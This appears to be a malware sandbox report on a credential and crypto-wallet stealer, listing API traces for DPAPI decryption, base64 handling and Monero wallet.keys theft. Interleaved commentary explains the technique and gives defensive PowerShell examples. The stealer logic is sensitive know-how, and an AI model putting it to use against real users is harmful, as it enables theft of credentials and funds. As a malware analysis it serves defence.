                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                    • String ID:
                                                    • API String ID: 2609814428-0
                                                    • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction ID: b0e76d362351271e7ccf27a7a883fd60447bc23111212b1f7832957db4cbaee8
                                                    • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction Fuzzy Hash: 56011275B40318BBEB14DB949C4AFAA7779EB44B15F104159FA05EB2C0D6B099008BE4
                                                    APIs
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptHeapString$AllocProcess
                                                    • String ID:
                                                    • API String ID: 3939037734-0
                                                    • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
                                                    • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4
                                                    APIs
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 024A4314
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 024A4323
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A432A
                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 024A435A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                                    • String ID:
                                                    • API String ID: 3825993179-0
                                                    • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction ID: 8e047da516dfa3c763636f297c0a0133a51c49b84e7bbcfb63a28ba658457a14
                                                    • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                    • Instruction Fuzzy Hash: 5E011A70600205ABEB149FA5EC89BABBBADEF95315F104159BD0987340DBB1E9408BA0
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
                                                    • memcpy.MSVCRT(00000000,?), ref: 00409C2A
                                                    • LocalFree.KERNEL32(?), ref: 00409C37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                    • String ID:
                                                    • API String ID: 3243516280-0
                                                    • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
                                                    • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02489E66
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02489E7A
                                                    • memcpy.MSVCRT(00000000,?), ref: 02489E91
                                                    • LocalFree.KERNEL32(?), ref: 02489E9E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                    • String ID:
                                                    • API String ID: 3243516280-0
                                                    • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction ID: 85a202be0afad24316839f0fabb8884f217e35aabd054fc1c1656b3b9246e251
                                                    • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                    • Instruction Fuzzy Hash: E2011D75A41305AFD7119BA4DC55FBFBB79EB44700F104559FA04AB380DBB09A00CBE4
                                                    APIs
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
                                                    • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                    • String ID:
                                                    • API String ID: 4291131564-0
                                                    • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                    • Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
                                                    • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                    • Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4
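The three CRYPT32 routines listed above are the base64 and DPAPI plumbing a credential stealer needs. CryptStringToBinaryA with dwFlags 0x00000001 (CRYPT_STRING_BASE64) turns a base64 string into a blob, CryptUnprotectData decrypts a DPAPI blob under the calling user's context, and CryptBinaryToStringA with 0x40000001 (CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF) re-encodes bytes for transport. Each call appears twice because of the usual Win32 size-then-fill idiom: the first call returns the required length, LocalAlloc or RtlAllocateHeap provides the buffer, and the second call fills it. The PowerShell below is an added example that reproduces the same pipeline with the managed equivalents; it is not code from the sample or from this report, and the value it protects is constructed. The caveat worth keeping in mind is that the unprotect step only succeeds under the same user account (CurrentUser scope) on the same machine, which is why a stealer decrypts on the victim host instead of exfiltrating raw blobs.

```powershell
# Added example: base64 <-> DPAPI round trip mirroring the CryptStringToBinaryA /
# CryptUnprotectData / CryptBinaryToStringA sequence in the sample. Not sample code.
Add-Type -AssemblyName System.Security

function Protect-ToBase64 {
    param([Parameter(Mandatory)][string]$PlainText)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText)
    # CryptProtectData equivalent, CurrentUser scope: tied to this user's DPAPI master key
    $blob = [System.Security.Cryptography.ProtectedData]::Protect($bytes, $null,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
    # CryptBinaryToStringA(..., CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF) equivalent
    [Convert]::ToBase64String($blob)
}

function Unprotect-FromBase64 {
    param([Parameter(Mandatory)][string]$Base64Blob)
    # CryptStringToBinaryA(..., CRYPT_STRING_BASE64) equivalent
    $blob = [Convert]::FromBase64String($Base64Blob)
    try {
        # CryptUnprotectData equivalent. Throws CryptographicException when run
        # as a different user or on a machine without this user's master key.
        $bytes = [System.Security.Cryptography.ProtectedData]::Unprotect($blob, $null,
            [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        [System.Text.Encoding]::UTF8.GetString($bytes)
    } catch [System.Security.Cryptography.CryptographicException] {
        Write-Warning "DPAPI unprotect failed: wrong user context or master key unavailable"
        $null
    }
}

# Constructed sample value; the round trip succeeds only under the protecting user.
$encoded = Protect-ToBase64 -PlainText 'constructed-secret-value'
$decoded = Unprotect-FromBase64 -Base64Blob $encoded
if ($decoded -ne 'constructed-secret-value') { throw 'round trip failed' }
$decoded
```

Run it as one user, then paste the same `$encoded` string into a session of another account on the same host: the second `Unprotect-FromBase64` call emits the warning and returns `$null`, which is the behaviour an analyst sees when trying to decrypt blobs harvested from a disk image offline.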
                                                    APIs
                                                    • CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0249CE6D
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0249CEAD
                                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 0249CF30
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                                    • String ID:
                                                    • API String ID: 1940255200-0
                                                    • Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                    • Instruction ID: f406b6ff3d1d268229d91bc99960c9f0a908bf83be7ac0c0c0cc5ad8be3b830b
                                                    • Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
                                                    • Instruction Fuzzy Hash: C0315271A40615BFDB10DB94CC81FAAB7B9AB88B54F504185FA04EB2D0D7B0AE45CBE0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2452939696-0
                                                    • Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
                                                    • Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
                                                    • Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
                                                    • Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                    • Instruction ID: e63ffb5fa32e55edb1d317d74778b45096babdf029b2fc40e30f77f6f01eac84
                                                    • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                    • Instruction Fuzzy Hash: BF71D631411B049BD7F33BB2DD21A4EFAA37F24701F10491EA1DA22DB49E326965DF51
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02482106
                                                    • lstrlen.KERNEL32(006389F0), ref: 02482115
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02482142
                                                    • lstrcat.KERNEL32(00000000,?), ref: 0248214A
                                                    • lstrlen.KERNEL32(00431D64), ref: 02482155
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482175
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 02482181
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024821A9
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024821B4
                                                    • lstrlen.KERNEL32(00431D64), ref: 024821BF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024821DC
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 024821E8
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482213
                                                    • lstrlen.KERNEL32(?), ref: 0248224B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248226B
                                                    • lstrcat.KERNEL32(00000000,?), ref: 02482279
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024822A0
                                                    • lstrlen.KERNEL32(00431D64), ref: 024822B2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024822D2
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 024822DE
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482304
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248230F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248233B
                                                    • lstrlen.KERNEL32(?), ref: 02482351
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482371
                                                    • lstrcat.KERNEL32(00000000,?), ref: 0248237F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024823A9
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024823E6
                                                    • lstrlen.KERNEL32(00638CA4), ref: 024823F4
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482418
                                                    • lstrcat.KERNEL32(00000000,00638CA4), ref: 02482420
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248245E
                                                    • lstrcat.KERNEL32(00000000), ref: 0248246B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482494
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 024824BD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024824E9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02482526
                                                    • DeleteFileA.KERNEL32(00000000), ref: 0248255E
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 024825AB
                                                    • FindClose.KERNEL32(00000000), ref: 024825BA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                                    • String ID:
                                                    • API String ID: 2857443207-0
                                                    • Opcode ID: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
                                                    • Instruction ID: f944d3e6008f80054e83f913bf64ac504e87c82e67d04d0e56dd45a3ee5cd3a3
                                                    • Opcode Fuzzy Hash: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
                                                    • Instruction Fuzzy Hash: 5FE15371A21296ABDB21FF75CC84A9E77FAAF44309F04442AEC05A7211DBB4DD41DFA0
                                                    APIs
                                                    • memset.MSVCRT ref: 0040108A
                                                      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                      • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                      • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                      • Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004010A0
                                                    • lstrlenA.KERNEL32(?), ref: 004010AD
                                                    • lstrcatA.KERNEL32(?,.keys), ref: 004010C8
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
                                                    • lstrlenA.KERNEL32(009485A8), ref: 0040110D
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401131
                                                    • lstrcatA.KERNEL32(00000000,009485A8), ref: 00401139
                                                    • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
                                                    • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
                                                    • lstrlenA.KERNEL32(0094E9E8), ref: 004011EE
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401215
                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040121D
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
                                                    • lstrcatA.KERNEL32(00000000), ref: 00401265
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004012E1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040131D
                                                      • Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                    • DeleteFileA.KERNEL32(?), ref: 00401351
                                                    • memset.MSVCRT ref: 0040136E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                                    • String ID: .keys$\Monero\wallet.keys
                                                    • API String ID: 2734118222-3586502688
                                                    • Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                    • Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
                                                    • Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
                                                    • Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8
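The function above is the Monero wallet theft routine. Its subcall opens HKEY_CURRENT_USER (0x80000001) \SOFTWARE\monero-project\monero-core, reads the wallet_path value, and the caller appends ".keys" to it; a second candidate is built by appending \Monero\wallet.keys to a base folder the sample resolves at runtime. Whichever file exists is duplicated with CopyFileA (bFailIfExists = 1), processed, and the copy removed with DeleteFileA. The PowerShell below is an added triage helper, not code from the sample or from this report: it lists the same candidate paths on a host and reports whether they exist and who can read them, so an analyst can judge exposure after an infection. The base folders it tries for the second candidate are assumptions (common Monero GUI defaults); the report shows only the \Monero\wallet.keys suffix.

```powershell
# Added example, not from the sample: enumerate the Monero wallet key files the
# stealer routine targets and report their presence and ACL on this host.
function Get-MoneroWalletTargets {
    $targets = [System.Collections.Generic.List[string]]::new()

    # 1. HKCU (0x80000001) \SOFTWARE\monero-project\monero-core, value "wallet_path",
    #    with ".keys" appended, exactly as the sample builds it.
    $regPath = 'HKCU:\SOFTWARE\monero-project\monero-core'
    $walletPath = (Get-ItemProperty -Path $regPath -Name 'wallet_path' -ErrorAction SilentlyContinue).wallet_path
    if ($walletPath) { $targets.Add("$walletPath.keys") }

    # 2. "<base>\Monero\wallet.keys". The report shows only the suffix; the base
    #    folders below are assumptions (Monero GUI defaults), not taken from the report.
    foreach ($base in @([Environment]::GetFolderPath('MyDocuments'),
                        [Environment]::GetFolderPath('ApplicationData'))) {
        if ($base) { $targets.Add((Join-Path $base 'Monero\wallet.keys')) }
    }

    foreach ($t in ($targets | Select-Object -Unique)) {
        $exists = Test-Path -LiteralPath $t -PathType Leaf
        [pscustomobject]@{
            Path   = $t
            Exists = $exists
            # Read access for the logged-on user is all the stealer needs: it runs in
            # that user's context and only calls CopyFileA / DeleteFileA on its own copy.
            Acl    = if ($exists) { (Get-Acl -LiteralPath $t).AccessToString } else { $null }
        }
    }
}

Get-MoneroWalletTargets | Format-Table -AutoSize -Wrap
```

A hit with Exists = True on a machine that ran this sample means the key file was within reach of the routine; treat the wallet as compromised and move funds from a clean host rather than relying on the .keys file's password alone.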
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495E7C
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02495EAB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495EDC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F04
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02495F0F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F37
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F6F
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02495F7A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495F9F
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495FD5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02495FFD
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02496008
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249602F
                                                    • lstrlen.KERNEL32(00431D64), ref: 02496041
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496060
                                                    • lstrcat.KERNEL32(00000000,00431D64), ref: 0249606C
                                                    • lstrlen.KERNEL32(00638DD8), ref: 0249607B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249609E
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024960A9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024960D3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024960FF
                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 02496106
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249615E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024961CD
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024961FF
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02496242
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249626E
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024962A6
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02496318
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249633C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                                    • String ID:
                                                    • API String ID: 2428362635-0
                                                    • Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                    • Instruction ID: 92614380f2631f25b9eec11e28201b7e7f238b15a9351214646fd83939b0b752
                                                    • Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
                                                    • Instruction Fuzzy Hash: 23029170A11255ABDF21EF79CC88AAF7BFAAF44304F15452AE805A7350DB74D941CF90
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02496B3C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02496B77
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02496BA1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496BD8
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02496BFD
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02496C05
